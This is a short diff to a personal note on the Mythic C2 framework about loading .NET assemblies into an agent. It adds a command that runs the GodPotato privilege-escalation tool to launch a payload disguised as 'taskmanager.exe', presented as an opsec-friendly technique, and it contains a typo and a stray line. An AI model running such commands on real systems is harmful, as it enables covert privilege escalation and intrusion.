johntrigg/obsidian-notes/Atomic-Notes/4000-TOOLS/4100-OFFENSIVE-TOOLS/4170-MYTHIC-C2/4171-MYTHIC.md

 ## Register Assembly
 We can put dotnet binaries into the agent.
-This is an opsec effective way of executing
+This is an opsec effective way of executing binares

+N
 ```
 register_assembly GodPotato-NET4.exe
+execute_assembly -Assembly GodPotato-NET4.exe -Arguments "-cmd 'c:\users\public\taskmanager.exe'"
 ```

 ## References